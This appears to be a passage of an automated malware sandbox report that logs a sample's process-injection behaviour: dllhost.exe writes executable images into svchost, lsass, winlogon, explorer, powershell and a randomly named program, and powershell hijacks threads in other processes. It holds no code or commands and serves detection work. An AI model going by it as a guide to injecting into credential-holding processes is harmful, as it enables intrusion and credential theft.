Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 115765F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17E36BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 204616A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F119790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 166BBF70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F3FF70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20DDFFA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 115765F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17E36BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 204616A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F119790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 166BBF70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F3FF70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20DDFFA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 242A6F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 242A7150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1DEE3460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1BF02230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A607DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A621FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F96B9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F96B9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1FD93340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2F9800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 187E4760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2FBA00000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 4056 base: 8850000 value: 4D
Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 4056 base: 8850000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 7228	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 7992
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3268	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 83F0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140004000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140006000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140007000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: D6D5A21010	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F4B920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 262F1CD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 262F1D00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A76A1A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0AB990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2129B2D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25178760000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22125DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E0F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D959540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 8850000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB06E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 238EF1C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2CA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26CDA140000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 580000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 680000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: C00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1480000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 12B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: B60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: D70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1060000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 500000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: F80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E0F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000
